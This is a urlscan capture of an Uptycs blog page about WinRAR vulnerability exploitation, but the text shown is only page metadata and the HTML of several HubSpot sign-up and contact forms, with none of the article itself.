www.uptycs.com
Open in
urlscan Pro
199.60.103.30
Public Scan
URL:
https://www.uptycs.com/blog/winrar-vulnerability-exploitation
Submission: On April 16 via api from BY — Scanned from DE
Submission: On April 16 via api from BY — Scanned from DE
Form analysis
3 forms found in the DOMPOST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e
<form id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e"
class="hs-form-private hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e_6a163c41-1de7-4bcd-9125-7dbb5e2777e0 hs-form stacked hs-custom-form"
target="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-instance-id="6a163c41-1de7-4bcd-9125-7dbb5e2777e0" data-form-id="a84fa16e-d67b-4c28-b1c2-bce43902236e" data-portal-id="2617658"
data-test-id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-hs-cf-bound="true">
<fieldset class="form-columns-0">
<div class="hs-richtext hs-main-font-element">
<h1 style="font-size: 20px;">Sign up here:</h1>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your First name"
for="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Last name"
for="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Work Email" for="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Phone number"
for="phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Company name"
for="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_my_security_priority_is_ hs-my_security_priority_is_ hs-fieldtype-select field hs-form-field" style="display: none;"><label id="label-my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your My security priority is:" for="my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>My security priority is:</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="my_security_priority_is_" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your How did you hear about us?" for="how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>How did you hear about us?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Job title"
for="jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Employees"
for="numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your LD BookIt Log ID"
for="ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>LD BookIt Log ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_source"
for="utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_source</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_medium"
for="utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_medium</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_content"
for="utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_content</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_campaign"
for="utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_campaign</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="legal-consent-container">
<div class="hs-richtext">
<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
</div>
</div>
</fieldset>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179640","formDefinitionUpdatedAt":"1699473876130","lang":"en","legalConsentOptions":"{\"legitimateInterestSubscriptionTypes\":[3136631],\"communicationConsentCheckboxes\":[{\"communicationTypeId\":3136631,\"label\":\"I agree to receive other communications from Uptycs.\",\"required\":false}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"communicationConsentText\":\"Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\",\"processingConsentCheckboxLabel\":\"I agree to allow Uptycs to store and process my personal data.\",\"privacyPolicyText\":\"<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\"https://www.uptycs.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a></u>.</p>\",\"isLegitimateInterest\":true}","embedType":"REGULAR","clonedFromForm":"d6de4afc-a64a-42eb-aa20-ab41fc2fe11c","notifyHubSpotOwner":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_772372348","formInstanceId":"8032","rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"339e825031d31583ab18f0bd876560f4","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","dateFields":"became_an_mql_date","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":2025.3000030517578,"rumTotalRenderTime":2163.300003051758,"rumServiceResponseTime":685.6000061035156,"rumFormRenderTime":138,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181308,"originalEmbedContext":{"portalId":"2617658","formId":"a84fa16e-d67b-4c28-b1c2-bce43902236e","region":"na1","target":"#hs_form_target_form_772372348","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"8032","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"Thanks for submitting the form.","isMobileResponsive":true,"rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"339e825031d31583ab18f0bd876560f4","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"6a163c41-1de7-4bcd-9125-7dbb5e2777e0","renderedFieldsIds":["firstname","lastname","email","phone","company","my_security_priority_is_","how_did_you_hear_about_uptycs_","company_hq___state","jobtitle","numberofemployees","became_an_mql_date","honeypot_queue","ld_bookit_log_id","utm_source","utm_medium","utm_content","utm_campaign"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298180175,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298180175,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298180176,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181302,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" style="display: none;"></iframe>
</form>
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802
<form id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802"
class="hs-form-private hsForm_0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802_1297ca44-21d4-42ea-8deb-d6564e7b5c32 hs-form stacked hs-custom-form"
target="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" data-instance-id="1297ca44-21d4-42ea-8deb-d6564e7b5c32" data-form-id="0492e7b1-c029-4110-8042-598f482d9802" data-portal-id="2617658"
data-test-id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your Work Email" for="email-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-0492e7b1-c029-4110-8042-598f482d9802_1944" name="email" required="" placeholder="email@work.com" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179620","formDefinitionUpdatedAt":"1689357225520","lang":"en","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_984600344","formInstanceId":"1944","rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"5e4fd5673911973f50e990e405439841","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":1991.3000030517578,"rumTotalRenderTime":2017.099998474121,"rumServiceResponseTime":651.6000061035156,"rumFormRenderTime":25.79999542236328,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181301,"originalEmbedContext":{"portalId":"2617658","formId":"0492e7b1-c029-4110-8042-598f482d9802","region":"na1","target":"#hs_form_target_form_984600344","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"1944","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"Thanks for submitting the form.","isMobileResponsive":true,"rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"5e4fd5673911973f50e990e405439841","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"1297ca44-21d4-42ea-8deb-d6564e7b5c32","renderedFieldsIds":["email","honeypot_queue"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298180141,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298180141,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298180142,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181297,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" style="display: none;"></iframe>
</form>
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f
<form id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f"
class="hs-form-private hsForm_464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f_3b848806-0722-4949-a72e-4881906c88f1 hs-form stacked hs-custom-form"
target="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-instance-id="3b848806-0722-4949-a72e-4881906c88f1" data-form-id="464171ef-7766-4b86-9e48-f51bb13b325f" data-portal-id="2617658"
data-test-id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-hs-cf-bound="true">
<div>
<div class="hs-richtext hs-main-font-element">
<h2 style="font-size: 20px; text-align: center; padding-bottom: 9px;">Connect with a security expert</h2>
</div>
</div>
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your First name"
for="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Last name"
for="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Work Email" for="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Phone number"
for="phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Company name"
for="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your How did you hear about Uptycs?" for="how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>How did you hear about Uptycs?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Job title"
for="jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Employees"
for="numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
<div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your LD BookIt Log ID"
for="ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>LD BookIt Log ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_source"
for="utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_source</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_medium"
for="utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_medium</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
</div>
